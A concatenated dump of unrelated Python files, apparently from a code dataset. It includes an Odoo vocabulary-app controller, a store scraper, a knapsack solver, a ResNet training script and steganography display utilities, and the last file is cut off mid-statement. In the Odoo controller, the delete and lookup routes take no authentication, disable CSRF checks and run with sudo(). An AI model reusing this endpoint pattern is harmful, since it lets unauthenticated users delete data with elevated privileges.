sentence_list\n\n defintion_list.append(defintion_word)\n\n result[\"defintion_list\"] = defintion_list\n result_list.append(result)\n return result_list\n\n @http.route('/api/v2/wechat_english_level', type='json', auth=\"user\")\n def get_word_level_list(self, **kwargs):\n return request.env['english.lexicon.master.level'].sudo().get_all_level()\n\n @http.route('/api/v2/wechat_english_save', type='json', auth=\"user\")\n def get_word_level_save(self, word_id, level_id, **kwargs):\n result = {'is_success': True}\n user_id = request.env.user.id\n try:\n request.env['english.lexicon.user.master'].sudo()\\\n .save_user_word(word_id, user_id, level_id)\n except Exception:\n result['is_success'] = False\n return result\n\n @http.route('/api/v2/get_word_id', type='http', auth=\"none\", csrf=False)\n def get_word_id(self, word, **kwargs):\n result = {'id': 0}\n request.session.db = \"Odoo_Project\"\n word_list = request.env['english.lexicon'].sudo().search([\n (\"word\", \"=\", word)], limit=1)\n if word_list:\n result[\"id\"] = word_list.id\n return json.dumps(result)\n\n @http.route('/api/v2/delete_word_id', type='http', auth=\"none\", csrf=False)\n def delete_word_id(self, **kwargs):\n request.session.db = \"Odoo_Project\"\n result = 
request.env['english.lexicon'].sudo().delete_attachment()\n return json.dumps(result)\n\n @http.route('/api/v2/wechat_level_words', type='json', auth=\"user\")\n def get_level_words(self, level_id, page_index, page_size, **kw):\n result = {'is_success': True}\n user_id = request.env.user.id\n try:\n data = request.env['english.lexicon.user.master'].sudo()\\\n .get_my_level_words(level_id, user_id, page_index, page_size)\n result['data'] = data\n except Exception as e:\n result['is_success'] = False\n result['info'] = tools.ustr(e)\n return result\n\n @http.route('/api/v2/wechat_insert_my_words', type='json', auth=\"user\")\n def insert_my_level_words(self, **kw):\n result = {'is_success': True}\n try:\n request.env['english.lexicon.user.master'].sudo().insert_my_words()\n except Exception as e:\n result['is_success'] = False\n result['info'] = tools.ustr(e)\n return result\n","sub_path":"wechat_mini_programs/controllers/wechat_english_controller.py","file_name":"wechat_english_controller.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"380974398","text":"# -*- coding:utf-8 -*-\n# 作者 :JunFengG\n# 创建时间 :2018/10/1 0001 16:53 \n# 文件 :UseTimeSeries\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom TimeSeries import convert_data_to_timeseries\n\n\ninput_file='data_timeseries.txt'\n\n#加载数据\ndata1=convert_data_to_timeseries(input_file,2)\ndata2=convert_data_to_timeseries(input_file,3)\n\n#转换为pandas数据帧\ndataframe=pd.DataFrame({'first':data1,'second':data2})\n\n#给定年份数据\ndataframe['1952':'1955'].plot()\nplt.title('First')\n\n\n#画出不同数据\nplt.figure()\ndifference=dataframe['1952':'1955']['first']-dataframe['1952':'1955']['second']\ndifference.plot()\nplt.title('Difference')\n\n#数据过滤\ndataframe[(dataframe['first']>60)&(dataframe['second']<20)].plot()\nplt.title('Selected')\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PythonMechineLearningCookbook/Chapter08/UseTimeSeries.py","file_name":"UseTimeSeries.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"513245474","text":"\"\"\"\nYou're given a dictionary of people and the number of games they've won.\n\nUse a for loop to iterate over the dictionary and print out the users name and how many games they've won in the\nfollowing format: sara has won n games\n\nTo make it human readable, pluralise the word game to suit the number of games won.\n\"\"\"\n\ngames_won = dict(sara=0, bob=1, tim=5, julian=3, jim=1)\n\n\ndef print_game_stats(games_won=games_won):\n \"\"\"Loop through games_won's dict (key, value) pairs (dict.items)\n printing (print, not return) how many games each person has won,\n pluralize 'game' based on number.\n\n Expected output (ignore the docstring's indentation):\n\n sara has won 0 games\n bob has won 1 game\n tim has won 5 games\n julian has won 3 games\n jim has won 1 game\n\n (Note that as of Python 3.7 - which we're using atm - dict insert order is retained\n so no sorting is required for this Bite.)\n \"\"\"\n for key in games_won:\n plural = \"game\"\n if games_won[key] != 1:\n plural = \"games\"\n print(\"{0} has won {1} {2}\".format(key, games_won[key], 
plural))\n\nprint_game_stats(games_won)","sub_path":"python/plurals.py","file_name":"plurals.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"425045363","text":"# -*- coding:utf-8 -*-\n\nimport requests\n\nproxies = {\n \"http\": \"http://10.10.1.10:3128\",\n \"https\": \"http://10.10.1.10:1080\",\n}\n\n\ndef get(url):\n '''\n @summary: 网络请求\n '''\n return requests.get(url, proxies=proxies)\n\n\nif __name__ == '__main__':\n print(get('http://www.baidu.com'))\n","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"598474503","text":"import pandas as pd\n\nfrom time import time\nfrom sklearn.model_selection import cross_val_score, StratifiedKFold\n\nfrom twitter.models.word2vec_model import build_model\n# from models.baseline_model import build_model\n\nimport logging\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n\n df = pd.read_csv('data/Tweets.csv')\n X = df['text'].values\n y = df['airline_sentiment']\n y = y.map({'negative': -1, 'neutral': 0, 'positive': 1}).values\n\n model = build_model(n_dim=25)\n\n t0 = time()\n\n # using determined test_splits for smart dump/load\n cv = StratifiedKFold(n_splits=3, random_state=42)\n scores = cross_val_score(model, X, y, cv=cv)\n\n score = scores.mean()\n std = scores.std()\n print(\"Score: %.4f +- %.4f\" % (score, std))\n print(\"Total done in %0.3fs\" % (time() - t0))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"twitter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"246335194","text":"import json\nimport re\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\n\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.utils import html_to_markdown, remove_words, \\\n session_with_proxy\n\n\nclass Todoclick(Store):\n @classmethod\n def categories(cls):\n return [\n 'AllInOne',\n 'Notebook',\n 'StorageDrive',\n 'SolidStateDrive',\n 'ExternalStorageDrive',\n 'PowerSupply',\n 'ComputerCase',\n 'Motherboard',\n 'Processor',\n 'VideoCard',\n 'Ram',\n 'Tablet',\n 'Headphones',\n 'Mouse',\n 'Keyboard',\n 'Monitor',\n 'Printer',\n 'UsbFlashDrive',\n 'StereoSystem',\n 'Wearable',\n ]\n\n @classmethod\n def discover_urls_for_category(cls, category, extra_args=None):\n category_paths = [\n ['notebooks', 'Notebook'],\n ['all-in-one', 'AllInOne'],\n ['disco-duro', 'StorageDrive'],\n ['fuentes-de-poder', 'PowerSupply'],\n ['gabinetes', 'ComputerCase'],\n ['placa-madre', 'Motherboard'],\n ['procesadores', 'Processor'],\n ['tarjetas-de-video', 'VideoCard'],\n ['memoria-ram', 'Ram'],\n ['tablet', 'Tablet'],\n ['audifonos', 'Headphones'],\n ['audifonos-gamer', 'Headphones'],\n ['mouse-accesorios', 'Mouse'],\n ['mouse-gamer', 'Mouse'],\n ['teclados', 'Keyboard'],\n ['teclado-gamer', 'Keyboard'],\n ['monitores', 'Monitor'],\n ['impresoras-laser-impresoras', 'Printer'],\n ['impresoras-ink-jet-impresoras', 'Printer'],\n ['multifuncional-laser', 'Printer'],\n ['multifuncional-ink-jet', 'Printer'],\n ['pendrive', 'UsbFlashDrive'],\n ['parlantes', 'StereoSystem'],\n ['soundbar', 'StereoSystem'],\n ['smartwatch', 'Wearable']\n ]\n\n session = 
session_with_proxy(extra_args)\n product_urls = []\n\n for category_path, local_category in category_paths:\n if local_category != category:\n continue\n\n page = 1\n\n while True:\n if page >= 15:\n raise Exception('Page overflow')\n\n if page == 1:\n page_url = 'https://todoclick.cl/{}/'.format(category_path)\n else:\n page_url = 'https://todoclick.cl/{}/page/{}/'\\\n .format(category_path, page)\n\n soup = BeautifulSoup(session.get(page_url).text, 'html.parser')\n products = soup.findAll('li', 'product')\n\n if not products:\n break\n\n for product in products:\n product_urls.append(product.find('a')['href'])\n\n page += 1\n\n return product_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n session = session_with_proxy(extra_args)\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'html5lib')\n\n name = soup.find('h1', 'product_title').text\n sku = soup.find('div', 'ct-code-block').text.split(':')[1].strip()\n\n stock = 0\n stock_container = soup.find('p', 'stock in-stock')\n if stock_container:\n stock = int(stock_container.text.split(' ')[0])\n\n offer_price_container = soup.find('p', 'price')\n\n if offer_price_container.find('ins'):\n offer_price_container = offer_price_container.find('ins')\n\n offer_price = Decimal(offer_price_container.find('span', 'amount')\n .text.replace('$', '').replace('.', ''))\n normal_price = Decimal(soup.find('div', {'id': 'Webpay'})\n .text.split('$')[1].replace('.', ''))\n\n images = soup.findAll('img', 'wp-post-image')\n picture_urls = [i['src'] for i in images]\n\n description = html_to_markdown(\n str(soup.find('div', {'id': 'tab-description'})))\n\n p = Product(\n name,\n cls.__name__,\n category,\n url,\n url,\n sku,\n stock,\n normal_price,\n offer_price,\n 'CLP',\n sku=sku,\n part_number=sku,\n picture_urls=picture_urls,\n description=description\n )\n\n return [p]\n","sub_path":"storescraper/stores/todoclick.py","file_name":"todoclick.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"572105773","text":"# Classic knapsack problem, memoized\r\n# Each item has a weight w_i and a value v_i. 
The knapsack can only take up to\r\n# weight W\r\ndef memoize(f):\r\n memo = {}\r\n\r\n # internal function\r\n def helper(*args):\r\n if args not in memo:\r\n memo[args] = f(*args)\r\n return memo[args]\r\n\r\n return helper\r\n\r\ndef knapsack(items, max_weight):\r\n # no more items/ none to choose from\r\n if len(items) == 0:\r\n return 0\r\n\r\n @memoize\r\n def knapsack_best_value(n, max_w):\r\n if n == 0:\r\n return 0\r\n\r\n value, weight = items[n-1]\r\n if weight > max_w:\r\n # can't add item, so skipping to next\r\n return knapsack_best_value(n-1,max_w)\r\n else:\r\n # choose best valued item, maximising over existing\r\n # value to new potential\r\n return max(knapsack_best_value(n-1,max_w-weight) + value,\r\n knapsack_best_value(n-1,max_w))\r\n\r\n j = max_weight\r\n result = []\r\n for i in range(len(items), 0, -1):\r\n if knapsack_best_value(i, j) != knapsack_best_value(i - 1, j):\r\n result.append(items[i - 1])\r\n j -= items[i - 1][1]\r\n result.reverse()\r\n\r\n # prints number of partial computations\r\n # print(\"Partial computations %d\" % len(bestvalue.cache))\r\n return knapsack_best_value(len(items), max_weight), result\r\n\r\nitems = [(4, 12), (2, 1), (6, 4), (1, 1), (2, 2)]\r\nprint(knapsack(items,15))\r\n","sub_path":"dp_problems/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"30694993","text":"import torch, numpy, os, shutil, math, re, torchvision, argparse, warnings\nfrom netdissect import parallelfolder, renormalize, pbar\nfrom torchvision import transforms\nfrom torch.optim import Optimizer\n\ndef parseargs():\n parser = argparse.ArgumentParser()\n def aa(*args, **kwargs):\n parser.add_argument(*args, **kwargs)\n aa('--dataset', choices=['imagenet', 'novelty'], default='novelty')\n aa('--selected_classes', type=int, default=413)\n aa('--training_iterations', type=int, default=100001)\n args = parser.parse_args()\n return args\n\ndef main():\n args = parseargs()\n experiment_dir = 'results/baseline-%d-%s-resnet' % (\n args.selected_classes, args.dataset)\n ds_dirname = dict(\n novelty='novelty/dataset_v1/known_classes/images',\n imagenet='imagenet')[args.dataset]\n training_dir = 'datasets/%s/train' % ds_dirname\n val_dir = 'datasets/%s/val' % ds_dirname\n os.makedirs(experiment_dir, exist_ok=True)\n with open(os.path.join(experiment_dir, 'args.txt'), 'w') as f:\n f.write(str(args) + '\\n')\n def printstat(s):\n with open(os.path.join(experiment_dir, 'log.txt'), 'a') as f:\n f.write(str(s) + '\\n')\n pbar.print(s)\n def filter_tuple(item):\n return item[1] < args.selected_classes\n # Imagenet has a couple bad exif images.\n warnings.filterwarnings('ignore', message='.*orrupt EXIF.*')\n # Here's our data\n train_loader = torch.utils.data.DataLoader(\n parallelfolder.ParallelImageFolders([training_dir],\n classification=True,\n filter_tuples=filter_tuple,\n transform=transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n renormalize.NORMALIZER['imagenet'],\n ])),\n batch_size=64, shuffle=True,\n num_workers=48, pin_memory=True)\n val_loader = torch.utils.data.DataLoader(\n parallelfolder.ParallelImageFolders([val_dir],\n classification=True,\n filter_tuples=filter_tuple,\n transform=transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n renormalize.NORMALIZER['imagenet'],\n ])),\n batch_size=64, 
shuffle=False,\n num_workers=24, pin_memory=True)\n late_model = torchvision.models.resnet50(num_classes=args.selected_classes)\n for n, p in late_model.named_parameters():\n if 'bias' in n:\n torch.nn.init.zeros_(p)\n elif len(p.shape) <= 1:\n torch.nn.init.ones_(p)\n else:\n torch.nn.init.kaiming_normal_(p, nonlinearity='relu')\n late_model.train()\n late_model.cuda()\n\n model = late_model\n\n max_lr = 5e-3\n max_iter = args.training_iterations\n criterion = torch.nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.Adam(model.parameters())\n scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr,\n total_steps=max_iter - 1)\n iter_num = 0\n best = dict(val_accuracy=0.0)\n # Oh, hold on. Let's actually resume training if we already have a model.\n checkpoint_filename = 'weights.pth'\n best_filename = 'best_%s' % checkpoint_filename\n best_checkpoint = os.path.join(experiment_dir, best_filename)\n try_to_resume_training = False\n if try_to_resume_training and os.path.exists(best_checkpoint):\n checkpoint = torch.load(os.path.join(experiment_dir, best_filename))\n iter_num = checkpoint['iter']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n scheduler.load_state_dict(checkpoint['scheduler'])\n best['val_accuracy'] = checkpoint['accuracy']\n\n def save_checkpoint(state, is_best):\n filename = os.path.join(experiment_dir, checkpoint_filename)\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename,\n os.path.join(experiment_dir, best_filename))\n\n def validate_and_checkpoint():\n model.eval()\n val_loss, val_acc = AverageMeter(), AverageMeter()\n for input, target in pbar(val_loader):\n # Load data\n input_var, target_var = [d.cuda() for d in [input, target]]\n # Evaluate model\n with torch.no_grad():\n output = model(input_var)\n loss = criterion(output, target_var)\n _, pred = output.max(1)\n accuracy = (target_var.eq(pred)\n ).data.float().sum().item() / input.size(0)\n val_loss.update(loss.data.item(), input.size(0))\n val_acc.update(accuracy, input.size(0))\n # Check accuracy\n pbar.post(l=val_loss.avg, a=val_acc.avg)\n # Save checkpoint\n save_checkpoint({\n 'iter': iter_num,\n 'state_dict': model.state_dict(),\n 'optimizer' : optimizer.state_dict(),\n 'scheduler' : scheduler.state_dict(),\n 'accuracy': val_acc.avg,\n 'loss': val_loss.avg,\n }, val_acc.avg > best['val_accuracy'])\n best['val_accuracy'] = max(val_acc.avg, best['val_accuracy'])\n printstat('Iteration %d val accuracy %.2f' %\n (iter_num, val_acc.avg * 100.0))\n\n # Here is our training loop.\n while iter_num < max_iter:\n for filtered_input, filtered_target in pbar(train_loader):\n # Track the average training loss/accuracy for each epoch.\n train_loss, train_acc = AverageMeter(), AverageMeter()\n # Load data\n input_var, target_var = [d.cuda()\n for d in [filtered_input, filtered_target]]\n # Evaluate model\n output = model(input_var)\n loss = criterion(output, target_var)\n train_loss.update(loss.data.item(), filtered_input.size(0))\n # Perform one step of SGD\n if iter_num > 0:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # Learning rate schedule\n scheduler.step()\n # Also check training set accuracy\n _, pred = output.max(1)\n accuracy = (target_var.eq(pred)).data.float().sum().item() / (\n filtered_input.size(0))\n train_acc.update(accuracy)\n remaining = 1 - iter_num / float(max_iter)\n pbar.post(l=train_loss.avg, a=train_acc.avg,\n v=best['val_accuracy'])\n 
# Occasionally check validation set accuracy and checkpoint\n            if iter_num % 1000 == 0:\n                validate_and_checkpoint()\n                model.train()\n            # Advance\n            iter_num += 1\n            if iter_num >= max_iter:\n                break\n\nclass AverageMeter(object):\n    \"\"\"Computes and stores the average and current value\"\"\"\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count\n\nif __name__ == '__main__':\n    torch.backends.cudnn.benchmark = True\n    main()\n","sub_path":"train_baseline_resnet.py","file_name":"train_baseline_resnet.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"148533611","text":"# Sets are unordered collections of unique elements.\n# Elements are not stored in any specific, reliable order.\n# Sets do not contain repeated elements.\n\nprint('Loja Stars Wars')\n\npedidos_dia1 = [ \n    {'Cliente': 'José', 'filme': 'A New Hope'},\n    {'Cliente': 'José', 'filme': 'A New Hope'},\n    {'Cliente': 'Francisco', 'filme': 'The Empire Strikes Back'},\n    {'Cliente': 'Luis', 'filme': ' Revenge of the Sith'},\n]\n\n\npedidos_dia2 = [\n    {'Cliente': 'Marco', 'filme': 'A New Hope'},\n    {'Cliente': 'Nuno', 'filme': 'A New Hope'},\n    {'Cliente': 'Carlos', 'filme': 'The Empire Strikes Back'},\n    {'Cliente': 'Rodrigo', 'filme': ' Revenge of the Sith'}, \n]\n\nclientes_dia1 = set()\nfor pedido in pedidos_dia1:\n    clientes_dia1.add(pedido['Cliente'])\n\nprint(f'Dia 1: {clientes_dia1}')\n\nclientes_dia2 = set()\nfor pedido in pedidos_dia2:\n    clientes_dia2.add(pedido['Cliente'])\n\nprint(f'Dia 2: {clientes_dia2}')\n\ntodos_clientes = clientes_dia1 | clientes_dia2\nprint(f'União: {todos_clientes}')\n\ncliente_comprou_todos_os_dias = clientes_dia1.intersection(clientes_dia2)\nprint(f'Intersecão: {cliente_comprou_todos_os_dias}')\n\nclientes_diferenca = clientes_dia1 - clientes_dia2\nprint(f'Diferença: {clientes_diferenca}')","sub_path":"python_do_zero/conjuntos.py","file_name":"conjuntos.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"315135062","text":"import autofit as af\r\nfrom src.dataset.dataset import Dataset\r\nfrom src.phase.result import Result\r\nfrom src.phase.analysis import Analysis\r\nfrom src.phase.settings import SettingsPhase\r\n\r\n\"\"\"\r\nThe phase package combines a data-set, model and `NonLinearSearch`, allowing us to fit the `Dataset` with the model. 
It\r\nessentially acts as the `meeting point` between the other packages in the project (dataset, fit, plot) and modules\r\nin the phase package (phase.py, analysis.py, result.py).\r\n\"\"\"\r\n\r\n\r\nclass Phase(af.AbstractPhase):\r\n\r\n \"\"\"\r\n This tells the phase that the input parameter `profiles` contains model components that are fitted for by the\r\n phase`s `NonLinearSearch`.\r\n\r\n In `analysis.py`, the `log_likelihood_function`' input parameter `instance` contains the `profiles` mapped from\r\n this model via the `NonLinearSearch` (as we saw in chapter 1).\r\n\r\n For your model-fitting problem, this will be replaced by the modules in your `model` package.\r\n \"\"\"\r\n\r\n profiles = af.PhaseProperty(\"profiles\")\r\n\r\n Result = Result # Set the result to the Result class in `result.py`\r\n\r\n def __init__(\r\n self,\r\n search: af.NonLinearSearch, # <- This specifies the default `NonLinearSearch` used by the phase.\r\n settings: SettingsPhase, # <- Settings will be covered in detail in tutorial 3.\r\n profiles: list,\r\n ):\r\n \"\"\"\r\n A phase which fits a `Gaussian` model using a `NonLinearSearch`.\r\n\r\n Parameters\r\n ----------\r\n search: class\r\n The class of a non_linear search\r\n settings : SettingsPhase\r\n The collection of settings of the phase used to augment the data that is fitted and tag the output path.\r\n profiles : [profiles.Profile]\r\n The model components (e.g. Gaussian, Exponential) fitted by this phase.\r\n \"\"\"\r\n super().__init__(search=search)\r\n\r\n self.settings = settings\r\n self.profiles = profiles\r\n\r\n def run(self, dataset: Dataset, info=None) -> Result:\r\n \"\"\"\r\n Pass a `Dataset` to the phase, running the phase and `NonLinearSearch`.\r\n\r\n Parameters\r\n ----------\r\n dataset : `Dataset`.Dataset\r\n The `Dataset` fitted by the phase, which is specified in the module `dataset/dataset.py`\r\n\r\n Returns\r\n -------\r\n result: result.Result\r\n A result object comprising information on the `NonLinearSearch` and the maximum likelihood model.\r\n Tutorial 3 will cover phase tagging, which this function handles.\"\"\"\r\n self.modify_search_paths()\r\n\r\n \"\"\"\r\n These functions create instances of the Analysis class (in `analysis.py`), runs the analysis (which performs\r\n the `NonLinearSearch` ) and returns an instance of the Result class (in `result.py`).\r\n\r\n Once you`ve looked through this module, check those modules out to see exactly what these classes do!\r\n \"\"\"\r\n analysis = self.make_analysis(dataset=dataset)\r\n\r\n \"\"\"\r\n `run_analysis` is not located in analysis.py, instead it is an inherited method from the parent class\r\n `af.AbstractPhase`. 
Essentially, all this function does is begin the `NonLinearSearch`, using the analysis\r\n created above.\r\n \"\"\"\r\n result = self.run_analysis(analysis=analysis, info=info)\r\n\r\n return self.make_result(result=result, analysis=analysis)\r\n\r\n def make_analysis(self, dataset: Dataset) -> Analysis:\r\n \"\"\"\r\n Returns an Analysis object, which uses the `Dataset` with functions to perform a fit.\r\n\r\n Parameters\r\n ----------\r\n dataset : `Dataset`.Dataset\r\n The `Dataset` fitted by the phase, which is specified in the module `dataset/dataset.py`\r\n\r\n Returns\r\n -------\r\n analysis : Analysis\r\n An analysis object that the `NonLinearSearch` calls to determine the fit log_likelihood for a given model\r\n instance.\r\n \"\"\"\r\n dataset = dataset.trimmed_dataset_from_settings(\r\n settings=self.settings.settings_dataset\r\n )\r\n\r\n return Analysis(dataset=dataset, settings=self.settings)\r\n\r\n def make_result(self, result: af.Result, analysis: Analysis) -> Result:\r\n return self.Result(\r\n samples=result.samples,\r\n previous_model=self.model,\r\n search=self.search,\r\n analysis=analysis,\r\n )\r\n\r\n def modify_search_paths(self):\r\n \"\"\"\r\n Modify the output paths of the phase before the non-linear search is run, so that the output path can be\r\n customized using the tags of the phase.\r\n \"\"\"\r\n self.search.paths.tag = self.settings.tag\r\n","sub_path":"notebooks/howtofit/chapter_phase_api/src/phase/phase.py","file_name":"phase.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"478712604","text":"a = (\"Процент\")\r\nb = (\"Процента\")\r\nc = (\"Процентов\")\r\nn = [i for i in range(1,101)]\r\nnumbs = {11,12,13,14}\r\nfor n in range(100):\r\n n = n + 1\r\n if n in numbs:\r\n print(n, \"процентов\")\r\n elif n % 10 == 1:\r\n print(n, \"процент\")\r\n elif n % 10 > 1 and n % 10 <5:\r\n print(n, \"процента\")\r\n else:\r\n print(n, \"процентов\")","sub_path":"Mironov_Mark_DZ_3.py","file_name":"Mironov_Mark_DZ_3.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"428763683","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport scipy.misc\nfrom keras.preprocessing import image\nimport os\nimport subprocess\nimport easygui\nfrom PIL import Image\n\nDATA_DIR = \"./data\"\nTRAIN_DIR = os.path.join(DATA_DIR, \"train\")\nTEST_DIR = os.path.join(DATA_DIR, \"test\")\n\n# IMG_SHAPE = (64, 64)\n\n\n\ndef pixel_errors(input_S, input_C, decoded_S, decoded_C):\n \"\"\"Calculates mean of Sum of Squared Errors per pixel for cover and secret images. \"\"\"\n see_Spixel = np.sqrt(np.mean(np.square(255 * (input_S - decoded_S))))\n see_Cpixel = np.sqrt(np.mean(np.square(255 * (input_C - decoded_C))))\n\n return see_Spixel, see_Cpixel\n\n# TODO debug\ndef pixel_histogram(diff_S, diff_C):\n \"\"\"Calculates histograms of errors for cover and secret image. 
\"\"\"\n    diff_Sflat = diff_S.flatten()\n    diff_Cflat = diff_C.flatten()\n\n    fig = plt.figure(figsize=(15, 5))\n    a = fig.add_subplot(1, 2, 1)\n\n    imgplot = plt.hist(255 * diff_Cflat, 100, normed=1, alpha=0.75, facecolor='red')\n    a.set_title('Distribution of error in the Cover image.')\n    plt.axis([0, 250, 0, 0.2])\n\n    a = fig.add_subplot(1, 2, 2)\n    imgplot = plt.hist(255 * diff_Sflat, 100, normed=1, alpha=0.75, facecolor='red')\n    a.set_title('Distribution of errors in the Secret image.')\n    plt.axis([0, 250, 0, 0.2])\n\n    plt.show()\n\ndef rgb2gray(rgb):\n    return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\n\ndef show_image(img, n_rows, n_col, idx, gray=False, first_row=False, title=None):\n    ax = plt.subplot(n_rows, n_col, idx)\n    if gray:\n        plt.imshow(rgb2gray(img), cmap = plt.get_cmap('gray'))\n    else:\n        plt.imshow(img)\n    ax.get_xaxis().set_visible(False)\n    ax.get_yaxis().set_visible(False)\n    if first_row:\n        plt.title(title)\n\n# Configs for results display\ndef result_display(input_S,input_C,decoded_S,decoded_C,\n                   SHOW_GRAY = False,SHOW_DIFF = True,ENHANCE = 1,n = 6):\n    '''\n\n    :param SHOW_GRAY: Show images in gray scale\n    :param SHOW_DIFF: Show difference between predictions and ground truth.\n    :param ENHANCE: Diff enhance magnitude\n    :param n: Number of secret and cover pairs to show.\n    :return:\n    '''\n    # Get absolute difference between the outputs and the expected values.\n    diff_S, diff_C = np.abs(decoded_S - input_S), np.abs(decoded_C - input_C)\n\n    # Print pixel-wise average errors in a 256 scale.\n    S_error, C_error = pixel_errors(input_S, input_C, decoded_S, decoded_C)\n\n    print(\"S error per pixel [0, 255]:\", S_error)\n    print(\"C error per pixel [0, 255]:\", C_error)\n    # pixel_histogram(diff_S, diff_C)\n    if n > 6:\n        n = 6\n\n    plt.figure(figsize=(14, 15))\n    rand_indx = [random.randint(0, len(input_C)) for x in range(n)]\n    # for i, idx in enumerate(range(0, n)):\n    for i, idx in enumerate(rand_indx):\n        n_col = 6 if SHOW_DIFF else 4\n\n        show_image(input_C[i], n, n_col, i * n_col + 1, gray=SHOW_GRAY, first_row=i == 0, title='Cover')\n\n        show_image(input_S[i], n, n_col, i * n_col + 2, gray=SHOW_GRAY, first_row=i == 0, title='Secret')\n\n        show_image(decoded_C[i], n, n_col, i * n_col + 3, gray=SHOW_GRAY, first_row=i == 0, title='Encoded Cover')\n\n        show_image(decoded_S[i], n, n_col, i * n_col + 4, gray=SHOW_GRAY, first_row=i == 0, title='Decoded Secret')\n\n        if SHOW_DIFF:\n            show_image(np.multiply(diff_C[i], ENHANCE), n, n_col, i * n_col + 5, gray=SHOW_GRAY, first_row=i == 0,\n                       title='Diff Cover')\n\n            show_image(np.multiply(diff_S[i], ENHANCE), n, n_col, i * n_col + 6, gray=SHOW_GRAY, first_row=i == 0,\n                       title='Diff Secret')\n\n    plt.show()\n\ndef MatrixToImage(data):\n    data = data*255\n    new_im = Image.fromarray(data.astype(np.uint8))\n    return new_im\n\n# new display and write\ndef iamge_save(decoded_S,decoded_C,orig_size,path='./outcome',name_box = None):\n    cover_path = path+'/cover/'\n    secret_path = path + '/secret/'\n    if not os.path.exists(path):\n        os.mkdir(path)\n    if not os.path.exists(cover_path):\n        os.mkdir(cover_path)\n    if not os.path.exists(secret_path):\n        os.mkdir(secret_path)\n    for i in range(decoded_C.shape[0]):\n        d_C = MatrixToImage(decoded_C[i])\n        d_S = MatrixToImage(decoded_S[i])\n        if d_C.size != orig_size[i]:\n            d_C = d_C.resize(orig_size[i], Image.ANTIALIAS)\n            d_S = d_S.resize(orig_size[i], Image.ANTIALIAS)\n        if name_box==None:\n            d_C.save(cover_path+f'{i}.png')\n            d_S.save(secret_path+f'{i}.png')\n        else:\n            d_C.save(cover_path + str(name_box[i])+r'.png')\n            d_S.save(secret_path + 
str(name_box[i])+r'.png')\n print('\\nFinsh! ')\n\n\n\ndef load_dataset_small(num_images_per_class_train, num_images_test, train_set_range):\n \"\"\"Loads training and test datasets, from Tiny ImageNet Visual Recogition Challenge.\n\n Arguments:\n num_images_per_class_train: number of images per class to load into training dataset.\n num_images_test: total number of images to load into training dataset.\n \"\"\"\n X_train = []\n X_test = []\n X_test_size = []\n\n\n # Get training dataset directory. It should contain 'train' folder and 'test' folder.\n path = easygui.diropenbox(title = 'Choose dataset directory')\n # path = './exp'\n # Create training set.\n train_set = os.listdir(os.path.join(path, 'train'))\n for c in train_set:\n train_set_range = train_set_range - 1\n if train_set_range < 0:\n break\n c_dir = os.path.join(path, 'train', c, 'images')\n c_imgs = os.listdir(c_dir)\n random.shuffle(c_imgs)\n for img_name_i in c_imgs[0:num_images_per_class_train]:\n img_i = image.load_img(os.path.join(c_dir, img_name_i))\n x = image.img_to_array(img_i)\n X_train.append(x)\n random.shuffle(X_train)\n\n # Create test set.\n test_dir = os.path.join(path, 'test','images')\n test_imgs = os.listdir(test_dir)\n random.shuffle(test_imgs)\n for img_name_i in test_imgs[0:num_images_test]:\n img_i = 